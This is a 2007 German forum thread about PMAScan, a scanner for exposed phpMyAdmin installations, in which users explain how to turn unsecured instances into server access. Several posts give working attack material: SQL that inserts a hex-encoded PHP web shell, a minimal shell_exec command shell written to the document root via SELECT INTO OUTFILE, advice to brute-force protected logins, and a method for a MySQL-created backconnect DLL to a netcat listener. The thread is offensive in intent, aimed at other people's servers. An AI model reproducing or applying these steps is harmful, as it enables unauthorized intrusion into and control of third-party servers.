PMAScan Beschreibung

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von eKs, 13. September 2007 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 13. September 2007
    Hoi, was genau macht pma scan eigentlich.
    Es sucht nach den DIR´s und schaut ob es zugänglich ist.

    Wenn es frei zugänglich ist, dann isses Unsecured
    Und wenn es passwortgeschützt ist, dann kommts in secured rein?!

    Kann man mit den Results aus dem unsecured rein garnichts anfangen?
     
  2. 13. September 2007
    AW: PMAScan Beschreibung

    ich vermute mal das man daraus einen stro machen kann pma scans sind doch php my admin scans oder nicht? phpmyadmin ist für sql datenbanken also denke ich mal das du über sqlexec nen stro draus machen kannst bin mir aber nicht ganz sicher
     
  3. 13. September 2007
    AW: PMAScan Beschreibung

    Naja der Grundgedanke stimmt

    Also, PMAScan schaut einfach nur, ob bestimmte Pfade existieren, hinter denen man vermutet, dass sich das PMA-Script befindet.
    Wenns so einen Pfad gibt, dann liefert der Server "200" oder sowas zurück. Man weiß, dass es ein unsecured ist, weil man einfach so Zugang hat.
    Wenn der Pfad nicht existiert, liefert der Server ein 404 zurück, wenn er existiert, aber man keine Zugriffsrechte hat (htacces o.ä.) liefert der Server 403 zurück.

    Und man kann versuchen, die secured-Scans zu bruten (Darunter sind übrigens auch die, wo einen Weblogin haben)..

    Und ja, man kann darüber Zugriff über den Server haben, allerdings ist es nich so leicht wie bei MSSQL. Bei PMA versucht man zuerst das Docroot rauszufinden (wo die html-Dateien und so gespeicher sind) und erzeugt dann mittels eines SQL-Befehls eine Shell in php im Docroot. Dann hat man Zugriff auf den Rechner (solange man genügend Rechte hat).
     
  4. 13. September 2007
    AW: PMAScan Beschreibung

    so ich hoff ihr haut mich jetzt nicht weil bißchen offtopic bin

    Aber mich würde der Letzte Abschnitt von pyro genauer intressieren!!
    Das Docroot bekomm ich ja über phpinfo raus (wenn es vorhanden ist) bzw es steht hinter den results!?!
    Aber dann muss man doch erst ne neue tabelle erzeugen? und dar dann mit nem sql befehl die shell erzeugen?
    Und wie sind die Befehle?? hatt das was mit der c99.php zu tun?

    Wär nett wenn mich jemand aufklärt!
     
  5. 13. September 2007
    AW: PMAScan Beschreibung

    Ja sie stehen in der phpinfo doch es giebt Server bei denen die phpinfo gelöscht ist.
    Das stimmt alles, doch ich weiß nicht ob ich hier die Befehle posten darf.
    Die c99.php ist die Shell die du brauchst (gibt aber noch viele andere) um anschließend zugriff auf den Server zu haben.

    @ekS
    Du musst die secured Results bruten

    mfg
     
  6. 13. September 2007
    AW: PMAScan Beschreibung

    Woher weist du das nur ^^ xDD


    Das Docroot findet man unter umständen auch in der PHPINFO();
    allerdings existerit sie nicht immer und ist nicht immer vollständig.

    Wenn man den Docroot hat kann man per sql einen HEX Code in eine tabelle einfügen der dann zu einer .php datei umgewandelt wird die dann interpretiert wird und dann in deinem gewählten Pfad ( der vom inet erreichbar sein sollte) eine shell generiert....

    Jene shells sind meistens sehr mächtig und können einem Zutritt verschaffen.
     
  7. 13. September 2007
    AW: PMAScan Beschreibung

    jaja, das Pyro was aufn kasten hat habe ich auch schon gemerkt

    Das mit dem Hex Code wäre noch interessant.
    Die Docroots sind in den meisten fällen bekannt.
    Könnteste mir mal nen Stichwort nennen?
     
  8. 13. September 2007
    AW: PMAScan Beschreibung

    Da war nen ganz klein wenig irnoie mit dabei ;-)


    Was willst du da hören.

    r57 shell zum beispiel....
    oder wie auch immer... da gibts tausende die man per google findet...


    so zum beispiel fängt meine an :

    Code:
    DROP TABLE IF EXISTS `fmz`;
    CREATE TABLE `fmz` (
    `fmz` longblob
    ) TYPE=MyISAM;
    insert into fmz (fmz) values (0x3C3C3F7068700D0A2F2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2F0D0A2F2A0D0A2F2A20202020202020202020202020202020202020202020202020202020202020202020202020232020202023202020202020202023202020202320202020202020202020202020202020202020202020202020202020200D0A2F2A2020202020202020202020202020202020202020202020202020202020202020202020202023202020232020202020202020202023202020230D0A2F2A202020202020202020202020202020202020202020202020202020202020202020202020232020202023202020202020202020202320202020230D0A2F2A202020202020202020202020202020202020202020202020202020202020202020202020232020202323202020232323232020202323202020230D0A2F2A20202020202020202020202020202020202020202020202020202020202020202020202323202020232320202323232323232020232320202023230D0A2F2A20202020202020202020202020202020202020202020202020202020202020202020202323202020232320202323232323232020232320202023230D0A2F2A202020
    
    
    und davon halt noch viel mehr ^^
     
  9. 14. September 2007
    AW: PMAScan Beschreibung

    Hmm dazu hätt ich mal ne frage..

    Code:
    DROP TABLE IF EXISTS `fmz`;
    CREATE TABLE `fmz` (
    `fmz` longblob
    ) TYPE=MyISAM;
    insert into fmz (fmz) values (0x3C3C3F7068700D0A2F2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2A2F0D0A2F2A0D0A2F2A20202020202020202020202020202020202020202020202020202020202020202020202020232020202023202020202020202023202020202320202020202020202020202020202020202020202020202020202020200D0A2F2A2020202020202020202020202020202020202020202020202020202020202020202020202023202020232020202020202020202023202020230D0A2F2A202020202020202020202020202020202020202020202020202020202020202020202020232020202023202020202020202020202320202020230D0A2F2A202020202020202020202020202020202020202020202020202020202020202020202020232020202323202020232323232020202323202020230D0A2F2A20202020202020202020202020202020202020202020202020202020202020202020202323202020232320202323232323232020232320202023230D0A2F2A20202020202020202020202020202020202020202020202020202020202020202020202323202020232320202323232323232020232320202023230D0A2F2A202020
    
    also ich hab jetz mit CREATE TABLE shell (text text);
    mir ne tabelle erstellt und dann hab ich folgendes gefunden und als sql eingesetzt
    (hab jetzt mal ne zeile raus genommen nicht das es jemand stört)
    Code:
    INSERT INTO shell (text) values ('<? $cmd = $_REQUEST["-cmd"];
    ?><html><head><title>SH3LL</title></head><body bgcolor=#000000 text=#FFFFFF"
    onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST> <input type=TEXT
    ************************
    if ($cmd != "";) print Shell_Exec($cmd); ?></pre></form></body></html>'); SELECT * INTO OUTFILE 'Hier DocRoot einsetzen' from shell;
    
    Leider klappt das nicht... Jetzt wollt ich wissen ob ich auch direkt php code in die erzeugte tabele schreiben kann?
    Weil alle schells die ich gefunden hab sind ja schon fertige php dateien und das was Smokers gepostet hatt ist ja Hexcode der dann wohl zu ner php schell wird!?
     
  10. 14. September 2007
    AW: PMAScan Beschreibung

    hat mir ein vögelchen geflüstert


    @b84nny: Natürlich kannst du da auch php-code einfügen.. Dein SQL-Code fügt ja auch PHP-Code ein, nur eben weniger als z.B. bei ner c99
     
  11. 14. September 2007
    AW: PMAScan Beschreibung

    also ist der hex code die c99 shell oder versteh ich das gerade falsch
     
  12. 14. September 2007
    AW: PMAScan Beschreibung

    Der hexcode = die php Datei die generiert wird.

    Das heißt eine r57 oder c99 shell ist vorher ein 5kb großer hexcode
    und nach der eingabe in die SQL Datenbank wird das durch PHP interpretiert.....
     
  13. 14. September 2007
    AW: PMAScan Beschreibung

    auf so eine idee wäre ich nie gekommen aber hab mich mit sql auch noch nicht wirkich beschäftigt
     
  14. 14. September 2007
    AW: PMAScan Beschreibung

    Man kann auch Zugriff ohne das docroot über einen Server erlangen. Das geht dann über die mysql datenbank und ein script das eine backconnect dll im systemroot erstellt. Wenn man die dll über den sql befehl erstellt hat, kann man über mysql eine backconnection zum listenden nc machen. Und fertig ist die shell. nc=netcat

    //

    achja klappt natürlich nur bei windows servern ^^

    mfg Romka
     
  15. 15. September 2007
    AW: PMAScan Beschreibung

    Ich denke mal das weicht langsam zu stark vom Thema ab,
    die ursprüngliche Frage wäre geklärt und der Rest kann ja denn per PN
    erledigt werden.

    closed*
     
  16. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.